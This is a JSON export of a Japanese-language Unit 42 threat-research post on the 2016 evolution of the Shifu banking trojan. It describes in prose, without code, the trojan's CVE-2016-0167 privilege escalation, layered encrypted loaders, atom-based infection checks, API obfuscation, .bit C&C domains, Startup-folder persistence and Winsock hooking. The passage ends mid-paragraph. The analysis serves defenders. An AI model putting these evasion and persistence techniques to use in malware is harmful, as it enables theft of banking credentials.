{"id":106805,"date":"2017-01-06T12:00:36","date_gmt":"2017-01-06T20:00:36","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=106805"},"modified":"2020-04-26T21:49:58","modified_gmt":"2020-04-27T04:49:58","slug":"unit42-2016-updates-shifu-banking-trojan","status":"publish","type":"post","link":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/","title":{"rendered":"Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e2016\u5e74\u306e\u66f4\u65b0"},"content":{"rendered":"<h2>\u6982\u8981<\/h2>\n<p style=\"font-weight: 400;\">Shifu\u306f2015\u5e74\u306b\u521d\u3081\u3066\u767a\u898b\u3055\u308c\u305f\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3067\u3042\u308a\u3001Zeus\u304c\u4f7f\u7528\u3057\u3066\u3044\u308b\u624b\u6cd5\u3092\u53d6\u308a\u8fbc\u3093\u3060Shiz\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u306fShifu\u3092\u4f7f\u7528\u3057\u3066\u4e16\u754c\u4e2d\u306e\u30aa\u30f3\u30e9\u30a4\u30f3 \u30d0\u30f3\u30ad\u30f3\u30b0\u306eWeb\u30b5\u30a4\u30c8\u306b\u95a2\u3059\u308b\u8cc7\u683c\u60c5\u5831\u3092\u76d7\u307f\u51fa\u3057\u307e\u3059\u3002\u6a19\u7684\u3068\u306a\u3063\u305fWeb\u30b5\u30a4\u30c8\u306f\u5f53\u521d\u30ed\u30b7\u30a2\u306e\u30b5\u30a4\u30c8\u3067\u3057\u305f\u304c\u3001\u305d\u306e\u5f8c\u82f1\u56fd\u3001\u30a4\u30bf\u30ea\u30a2\u306a\u3069\u306e\u30b5\u30a4\u30c8\u306b\u53ca\u3093\u3067\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">Palo Alto Networks\u306eUnit 42\u306e\u30ea\u30b5\u30fc\u30c1\u306b\u3088\u308a\u3001Shifu\u306e\u4f5c\u6210\u8005\u304c2016\u5e74\u306bShifu\u3092\u9032\u5316\u3055\u305b\u305f\u3053\u3068\u304c\u5206\u304b\u3063\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3001Microsoft 
Windows\u30b7\u30b9\u30c6\u30e0\u3092\u611f\u67d3\u3055\u305b\u3001\u691c\u51fa\u3092\u56de\u907f\u3059\u308b\u305f\u3081\u306e\u8907\u6570\u306e\u65b0\u624b\u6cd5\u304cShifu\u306b\u53d6\u308a\u5165\u308c\u3089\u308c\u305f\u3053\u3068\u3082\u5206\u304b\u3063\u3066\u3044\u307e\u3059\u3002\u65b0\u624b\u6cd5\u306e\u4e00\u90e8\u3068\u3057\u3066\u4ee5\u4e0b\u306e\u3082\u306e\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">Microsoft Windows\u306e\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\u3067\u3042\u308bCVE-2016-0167\u3092\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3057\u3066SYSTEM\u30ec\u30d9\u30eb\u306e\u6a29\u9650\u3092\u53d6\u5f97\u3002\u4ee5\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306eShifu\u306fCVE-2015-0003\u3092\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3057\u3066\u540c\u3058\u76ee\u7684\u3092\u679c\u305f\u3057\u307e\u3057\u305f\u3002<\/li>\n<li style=\"font-weight: 400;\">\u30db\u30b9\u30c8\u304c\u65e2\u306bShifu\u306b\u611f\u67d3\u3057\u3066\u3044\u308b\u304b\u78ba\u8a8d\u3059\u308b\u305f\u3081\u306b\u3001\u4ee5\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u305f\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u306b\u52a0\u3048\u3001Windows\u306e\u30a2\u30c8\u30e0\u3092\u4f7f\u7528\u3002<\/li>\n<li style=\"font-weight: 400;\">\u95a2\u6570\u547c\u3073\u51fa\u3057\u304c\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30a2\u30ca\u30ea\u30b9\u30c8\u306b\u898b\u3064\u304b\u3089\u306a\u3044\u3088\u3046\u306b\u3059\u308b\u305f\u3081\u3001\u201cpush-calc-ret\u201d\u65b9\u5f0f\u306eAPI\u96e3\u8aad\u5316\u3092\u5229\u7528\u3002<\/li>\n<li style=\"font-weight: 400;\">\u4ee3\u66ff\u3068\u306a\u308bNamecoin\u306e.bit\u30c9\u30e1\u30a4\u30f3\u306e\u4f7f\u7528<\/li>\n<\/ul>\n<p style=\"font-weight: 
400;\">Shifu\u3068\u4ed6\u306e\u30c4\u30fc\u30eb\u3068\u306e\u9593\u306e\u65b0\u305f\u306a\u95a2\u9023\u3082\u7a81\u304d\u6b62\u3081\u307e\u3057\u305f\u304c\u3001\u3053\u308c\u3089\u306e\u95a2\u9023\u304b\u3089\u3001Shifu\u304c\u5358\u7d14\u306bShiz\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306b\u4f9d\u62e0\u3057\u305f\u3082\u306e\u3067\u306f\u306a\u304fShiz\u306e\u6700\u65b0\u306e\u9032\u5316\u7248\u3067\u3042\u308b\u3053\u3068\u306f\u307b\u307c\u78ba\u5b9f\u3067\u3042\u308b\u3068\u601d\u308f\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u672c\u30ec\u30dd\u30fc\u30c8\u306e\u4e3b\u305f\u308b\u76ee\u7684\u306f\u3001\u4ed6\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u5206\u6790\u3057\u3066\u3044\u308b\u304c\u5c06\u6765\u3053\u306e\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306b\u906d\u9047\u3059\u308b\u53ef\u80fd\u6027\u306e\u3042\u308b\u30a2\u30ca\u30ea\u30b9\u30c8\u306b\u3001Shifu\u306e\u65b0\u6a5f\u80fd\u3092\u7d39\u4ecb\u3059\u308b\u3053\u3068\u3067\u3059\u3002\u4ee5\u4e0b\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u3053\u306e\u65b0\u6a5f\u80fd\u306b\u3064\u3044\u3066\u6982\u8981\u3092\u304a\u4f1d\u3048\u3057\u307e\u3059\u3002\u7d42\u308f\u308a\u306e\u65b9\u306e\u4ed8\u9332\u306b\u306fShifu\u306e\u6a5f\u80fd\u306e\u5168\u822c\u306b\u95a2\u3059\u308b\u6280\u8853\u7684\u306a\u8a73\u7d30\u60c5\u5831\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<h3>Shifu\u306b\u304a\u3051\u308b\u65b0\u305f\u306a\u958b\u767a\u304a\u3088\u3073\u6a5f\u80fd<\/h3>\n<p style=\"font-weight: 
400;\">\u672c\u5206\u6790\u3067\u691c\u8a0e\u3059\u308bShifu\u306f\u6570\u6bb5\u968e\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089\u69cb\u6210\u3055\u308c\u3066\u304a\u308a\u30012016\u5e746\u6708\u306b\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u307e\u3057\u305f\u3002\u4ee5\u4e0b\u306e\u56f3\u306f\u3001\u5b9f\u884c\u5f8c\u306b\u5fa9\u53f7\u5316\u51e6\u7406\u3092\u53d7\u3051\u308b\u5404\u7a2e\u306e\u30d5\u30a1\u30a4\u30eb\u304c\u521d\u671f\u30ed\u30fc\u30c0\u30fc\u306b\u542b\u307e\u308c\u3066\u3044\u308b\u69d8\u5b50\u3092\u8868\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_23105\" aria-describedby=\"caption-attachment-23105\" style=\"width: 402px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_1.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23105 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_1.png\" alt=\"\u56f31 Shifu\u306e\u30d5\u30a1\u30a4\u30eb\u69cb\u9020\" width=\"402\" height=\"750\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_1.png 402w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_1-161x300.png 161w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_1-370x690.png 370w\" sizes=\"(max-width: 402px) 100vw, 402px\" \/><\/a><figcaption id=\"caption-attachment-23105\" class=\"wp-caption-text\">\u56f31 Shifu\u306e\u30d5\u30a1\u30a4\u30eb\u69cb\u9020<\/figcaption><\/figure>\n<p style=\"font-weight: 
400;\">\u6700\u521d\u306e\u96e3\u8aad\u5316\u6e08\u307f\u30ed\u30fc\u30c0\u30fc(x86\u7248exe)\u306b\u306f\u7b2c2\u6bb5\u968e\u306e\u6697\u53f7\u5316\u6e08\u307f\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc(x86\u7248exe)\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u6700\u521d\u306e\u30ed\u30fc\u30c0\u30fc\u306f\u3001\u5f8c\u3067\u6b21\u306e\u30ec\u30a4\u30e4\u30fc\u7528\u306bVirtualAlloc()\u306b\u3088\u308a\u30e1\u30e2\u30ea\u3092\u5272\u308a\u5f53\u3066\u308b\u3053\u3068\u3067\u3001\u5fa9\u53f7\u5316\u7528\u306b3\u3064\u306e\u30ec\u30a4\u30e4\u30fc\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u304c\u30e1\u30e2\u30ea\u306e\u4e2d\u306b\u5fa9\u53f7\u5316\u3055\u308c\u308b\u3068\u3001\u5143\u306e\u30ed\u30fc\u30c0\u30fc \u30d7\u30ed\u30bb\u30b9\u304c\u3053\u308c\u3067\u4e0a\u66f8\u304d\u3055\u308c\u307e\u3059\u3002\u6b21\u306b\u30bb\u30af\u30b7\u30e7\u30f3 \u30d5\u30e9\u30b0\u304c\u8abf\u6574\u3055\u308c\u3001IAT\u30a2\u30c9\u30ec\u30b9\u304c\u89e3\u6c7a\u3055\u308c\u307e\u3059\u3002\u6700\u5f8c\u306e\u5fa9\u53f7\u5316\u30ec\u30a4\u30e4\u30fc\u306f\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306e\u5165\u308a\u53e3\u70b9\u306b\u30b8\u30e3\u30f3\u30d7\u3057\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f<a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms16-039.aspx\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">CVE-2016-0167<\/a>\u7528\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c2\u3064(x86\/x64)\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u304c\u3001\u3053\u308c\u3089\u306e\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 
\u30b9\u30bf\u30f3\u30d7\u306f2016\u5e742\u6708\u3067\u3059\u3002\u3053\u306e\u30b3\u30f3\u30d1\u30a4\u30eb\u306e\u6642\u70b9\u306b\u304a\u3044\u3066\u3001\u3053\u306e\u8106\u5f31\u6027\u306b\u5bfe\u3059\u308b\u30d1\u30c3\u30c1\u306f\u307e\u3060\u5165\u624b\u53ef\u80fd\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u3057\u304b\u3057\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306f2016\u5e746\u6708\u3067\u3059\u3002\u3053\u306e\u3053\u3068\u304b\u3089\u3001Shifu\u306e\u3053\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u80cc\u5f8c\u306b\u3044\u308b\u4eba\u7269\u305f\u3061\u304c\u30bc\u30ed\u30c7\u30a4 \u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u5f53\u6642\u5165\u624b\u3067\u304d\u308b\u72b6\u614b\u3067\u3042\u3063\u305f\u304b\u3001\u3042\u308b\u3044\u306f\u305d\u306e\u5f8c\u306b\u5165\u624b\u3057\u305f\u3053\u3068\u304c\u4f3a\u3048\u308b\u3068\u8a00\u3063\u3066\u3082\u3044\u3044\u3067\u3057\u3087\u3046\u3002\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u30ed\u30fc \u30c7\u30a3\u30b9\u30af \u30d5\u30a1\u30a4\u30eb\u3092\u30e1\u30e2\u30ea\u306b\u305f\u3060\u30b3\u30d4\u30fc\u3059\u308b\u3060\u3051\u306e\u3053\u3068\u3092\u53ef\u80fd\u306b\u3059\u308b\u8208\u5473\u6df1\u3044\u624b\u6cd5\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30e1\u30e2\u30ea\u5185\u3067\u5b9f\u884c\u53ef\u80fd\u306a\u3082\u306e\u306b\u3059\u308b\u305f\u3081\u30012\u3064\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u672b\u5c3e\u306bPE\u30aa\u30fc\u30d0\u30fc\u30ec\u30a4\u3068\u3057\u3066\u8ffd\u52a0\u3055\u308c\u305f\u3001\u7279\u5225\u4ed5\u69d8\u306ePE\u30ed\u30fc\u30c0\u30fc 
\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u3092\u4f7f\u3044\u307e\u3059\u3002\u3053\u306e\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306f\u3001\u5fc5\u8981\u3068\u306a\u308b\u3042\u3089\u3086\u308b\u8abf\u6574\u3092\u884c\u3063\u3066\u9069\u5207\u306a\u5b9f\u884c\u53ef\u80fd\u306a\u30e1\u30e2\u30ea \u30a4\u30e1\u30fc\u30b8\u3092\u53d6\u5f97\u3057\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u305d\u306e\u3088\u3046\u306b\u3059\u308c\u3070\u3001\u30d5\u30a1\u30a4\u30eb\u3092\u30e1\u30e2\u30ea \u30d0\u30c3\u30d5\u30a1\u30fc\u306b\u30b3\u30d4\u30fc\u3059\u308b\u3060\u3051\u3067\u3088\u304f\u3001\u3042\u3068\u306f\u5b9f\u884c\u3092\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306b\u307e\u304b\u305b\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u307e\u305f\u3001\u79c1\u305f\u3061\u306f\u30b9\u30bf\u30f3\u30c9\u30a2\u30ed\u30f3\u7248(x86\/64)\u3067\u3042\u308b\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u5225\u306e\u4e9c\u7a2e\u3082\u8907\u6570\u767a\u898b\u3057\u307e\u3057\u305f\u304c\u3001Shifu\u306b\u304a\u3051\u308b\u306e\u3068\u540c\u69d8\u306b\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u57cb\u3081\u8fbc\u307e\u308c\u305f\u30d0\u30fc\u30b8\u30e7\u30f3\u3082\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u3055\u3089\u306b\u3001Vawtrak\u3068\u3044\u3046\u30d0\u30fc\u30b8\u30e7\u30f3\u3092\u7a81\u304d\u6b62\u3081\u307e\u3057\u305f\u3002\u3053\u308c\u306b\u306f\u3001\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306b\u3088\u308c\u3070\u30012015\u5e7411\u6708\u306b\u307e\u3067\u9061\u308b\u53e4\u3044\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306eVawtrak\u30b5\u30f3\u30d7\u30eb\u81ea\u8eab\u306e\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 
\u30b9\u30bf\u30f3\u30d7\u306f2016\u5e741\u6708\u3067\u3059\u304b\u3089\u3001\u3053\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u5229\u7528\u3059\u308b\u30de\u30eb\u30a6\u30a7\u30a2\u3068\u3057\u3066\u306f\u79c1\u305f\u3061\u304c\u77e5\u3063\u3066\u3044\u308b\u4e8b\u5b9f\u4e0a\u6700\u521d\u306e\u3082\u306e\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f\u3001\u4ee5\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u985e\u4f3c\u306e\u5206\u6790\u5bfe\u7b56\u30c8\u30ea\u30c3\u30af\u304c\u3044\u304f\u3064\u304b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u30022\u500b\u306e\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u5f15\u6570\u3082\u542b\u307e\u308c\u3066\u304a\u308a\u3001\u3053\u308c\u3089\u306e\u5f15\u6570\u306b\u306f\u30de\u30eb\u30a6\u30a7\u30a2\u304c\u307e\u3060\u958b\u767a\u4e2d\u306e\u3082\u306e\u3067\u3042\u308b\u3053\u3068\u3092\u793a\u3059\u6a5f\u80fd\u304c\u5099\u308f\u3063\u3066\u3044\u307e\u3059\u3002\u3055\u3089\u306b\u3001\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u30a2\u30c8\u30e0\u3092\u4f7f\u7528\u3057\u3066\u30b7\u30b9\u30c6\u30e0\u304c\u65e2\u306b\u611f\u67d3\u3057\u3066\u3044\u308b\u304b\u78ba\u8a8d\u3057\u307e\u3059\u3002\u3064\u307e\u308a\u3001\u4eca\u65e5\u306e\u5927\u90e8\u5206\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u304c\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u3092\u4f7f\u3063\u3066\u3044\u307e\u3059\u304c\u3001\u305d\u308c\u3068\u306f\u9055\u3046\u65b9\u6cd5\u3067\u3059\u3002\u30a2\u30c8\u30e0\u306e\u4f7f\u7528\u306f\u65b0\u3057\u3044\u624b\u6cd5\u3067\u306f\u306a\u3044\u3082\u306e\u306e\u3001\u307e\u3060\u305d\u308c\u307b\u3069\u5e83\u304f\u666e\u53ca\u306f\u3057\u3066\u3044\u307e\u305b\u3093\u3002<\/p>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 
\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6697\u53f7\u5316\u3055\u308c\u3001\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306e.tls\u30bb\u30af\u30b7\u30e7\u30f3\u5185\u306b\u5727\u7e2e\u3055\u308c\u305f\u72b6\u614b\u3067\u7f6e\u304b\u308c\u307e\u3059\u3002\u3053\u308c\u306f\u307e\u305a\u5fa9\u53f7\u5316\u3055\u308c\u3001\u3064\u3044\u3067aPLib\u5727\u7e2e\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u3063\u3066\u89e3\u51cd\u3055\u308c\u307e\u3059\u3002\u6c38\u7d9a\u6027\u306e\u65b9\u6cd5\u3068\u3057\u3066\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6700\u521d\u306e\u30ed\u30fc\u30c0\u30fc\u3092AppData\u30d5\u30a9\u30eb\u30c0\u30fc\u306b\u30b3\u30d4\u30fc\u3057\u3001\u305d\u308c\u3092\u6307\u3057\u793a\u3059Jscript\u30d5\u30a1\u30a4\u30eb\u3092Startup\u30d5\u30a9\u30eb\u30c0\u30fc\u5185\u306b\u4f5c\u6210\u3057\u307e\u3059\u3002\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u3092svchost\u306ex86\u7248\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u5185\u90e8\u306b\u30a4\u30f3\u30b8\u30a7\u30af\u30c8\u3057\u3001\u305d\u306eAPI\u95a2\u6570\u547c\u3073\u51fa\u3057\u306b\u5bfe\u3057\u3066\u96e3\u8aad\u5316\u624b\u6cd5\u3092\u4f7f\u3063\u3066\u30d1\u30c3\u30c1\u3092\u5f53\u3066\u3066\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u95a2\u3059\u308b\u9759\u7684\u89e3\u6790\u304a\u3088\u3073\u52d5\u7684\u89e3\u6790\u3092\u3044\u3063\u305d\u3046\u56f0\u96e3\u306a\u3082\u306e\u306b\u3057\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u4ee5\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u3082\u306e\u306b\u6bd4\u3079\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306b\u306f\u66f4\u65b0\u304c\u3044\u304f\u3064\u304b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u305d\u306e\u4e2d\u306b\u306f\u3001\u88ab\u5bb3\u8005\u306e\u30b7\u30b9\u30c6\u30e0\u3001\u30d6\u30e9\u30a6\u30b6\u306e\u6a19\u7684\u306e\u30ea\u30b9\u30c8\u3001\u304a\u3088\u3073\u30dc\u30c3\u30c8 
\u30b3\u30de\u30f3\u30c9\u306b\u95a2\u3057\u3066\u691c\u7d22\u3092\u884c\u3046\u305f\u3081\u306e\u6587\u5b57\u5217\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f.bit\u306e\u30c8\u30c3\u30d7\u30ec\u30d9\u30eb \u30c9\u30e1\u30a4\u30f3\u3092\u4f7f\u7528\u3057\u3066C&amp;C\u30b5\u30fc\u30d0\u3068\u9023\u7d61\u3092\u53d6\u308a\u307e\u3059\u3002\u30c9\u30e1\u30a4\u30f3\u540d\u3001\u30e6\u30fc\u30b6\u30fc \u30a8\u30fc\u30b8\u30a7\u30f3\u30c8\u6587\u5b57\u5217\u3001\u304a\u3088\u3073URL\u5f15\u6570\u306f\u6539\u9020\u3055\u308c\u305fRC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u7528\u3044\u3066\u6697\u53f7\u5316\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30c9\u30e1\u30a4\u30f3\u540d\u304b\u3089\u3001\u653b\u6483\u8005\u304c\u30a6\u30af\u30e9\u30a4\u30ca\u5728\u4f4f\u3067\u3042\u308b\u304b\u3001\u3042\u308b\u3044\u306f\u30a6\u30af\u30e9\u30a4\u30ca\u3067\u80b2\u3063\u305f\u304b\u306e\u3044\u305a\u308c\u304b\u3067\u3042\u308b\u53ef\u80fd\u6027\u304c\u4f3a\u3048\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u3042\u3044\u306b\u304f\u5206\u6790\u6642\u306b\u306fC&amp;C\u30b5\u30fc\u30d0\u304c\u3069\u306e\u30b3\u30de\u30f3\u30c9\u306b\u5bfe\u3057\u3066\u3082\u5fdc\u7b54\u3057\u306a\u304b\u3063\u305f\u305f\u3081\u3001\u6a19\u7684\u306b\u3055\u308c\u305f\u91d1\u878d\u6a5f\u95a2\u306b\u3064\u3044\u3066\u3053\u308c\u4ee5\u4e0a\u5206\u6790\u3092\u9032\u3081\u308b\u3053\u3068\u306f\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u3053\u306e\u60c5\u5831\u306f\u3001\u901a\u5e38\u3067\u3042\u308c\u3070\u3001\u88ab\u5bb3\u8005\u306e\u30c7\u30a3\u30b9\u30af\u306e\u8a2d\u5b9a\u30d5\u30a1\u30a4\u30eb\u306b\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u308b\u3067\u3057\u3087\u3046\u3002\u81ea\u8eab\u306e\u4e00\u90e8\u306e\u6a5f\u80fd\u306e\u305f\u3081\u306b\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u30e1\u30a4\u30f3 
\u30da\u30a4\u30ed\u30fc\u30c9\u81ea\u8eab\u304c\u30a4\u30f3\u30b8\u30a7\u30af\u30c8\u3055\u308c\u3066\u3044\u308bsvchost.exe\u30d7\u30ed\u30bb\u30b9\u5185\u90e8\u306bAPI\u95a2\u6570\u3092\u30d5\u30c3\u30af\u3057\u307e\u3059\u3002\u3055\u3089\u306b\u3001Web\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3092\u76ee\u7684\u3068\u3057\u3066Apache Web\u30b5\u30fc\u30d0\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002C&amp;C\u30b5\u30fc\u30d0\u304b\u3089Apache Web\u30b5\u30fc\u30d0\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u3053\u3068\u306b\u6210\u529f\u3059\u308b\u3068\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u30ec\u30a4\u30e4\u30fc\u5316\u3055\u308c\u305f\u30b5\u30fc\u30d3\u30b9 \u30d7\u30ed\u30d0\u30a4\u30c0\u30fc\u3092\u5229\u7528\u3057\u3066Winsock API\u306b\u30d5\u30c3\u30af\u3092\u4ed5\u639b\u3051\u307e\u3059\u304c\u3001\u305d\u306e\u76ee\u7684\u306f\u30a4\u30f3\u30d0\u30a6\u30f3\u30c9\u304a\u3088\u3073\u30a2\u30a6\u30c8\u30d0\u30a6\u30f3\u30c9\u306e\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8 \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u508d\u53d7\u3057\u3001\u6539\u3056\u3093\u3059\u308b\u3053\u3068\u3067\u3059\u3002\u307e\u305f\u3001\u305d\u306e\u4ed6\u306e\u591a\u304f\u306e\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306b\u898b\u3089\u308c\u308b\u30d6\u30e9\u30a6\u30b6 \u30cd\u30c3\u30c8\u30ef\u30fc\u30ad\u30f3\u30b0\u95a2\u6570\u306b\u30d5\u30c3\u30af\u3092\u4ed5\u639b\u3051\u308b\u305f\u3081\u306e\u3001\u901a\u5e38\u4f7f\u7528\u3055\u308c\u308b\u30e1\u30bd\u30c3\u30c9\u3082\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u3068\u30e1\u30a4\u30f3 
\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u3069\u3061\u3089\u306b\u3082\u3001\u6c7a\u3057\u3066\u4f7f\u7528\u3055\u308c\u308b\u3053\u3068\u306e\u306a\u3044\u6587\u5b57\u5217\u304c\u5927\u91cf\u306b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u3053\u3068\u304b\u3089\u3001\u4f5c\u6210\u8005\u304c\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u5927\u6025\u304e\u3067\u69cb\u7bc9\u3057\u305f\u304b\u3001\u305a\u3055\u3093\u306a\u3084\u308a\u65b9\u3067\u958b\u767a\u304c\u884c\u308f\u308c\u305f\u304b\u306e\u3044\u305a\u308c\u304b\u3067\u3042\u308b\u3053\u3068\u304c\u4f3a\u3048\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 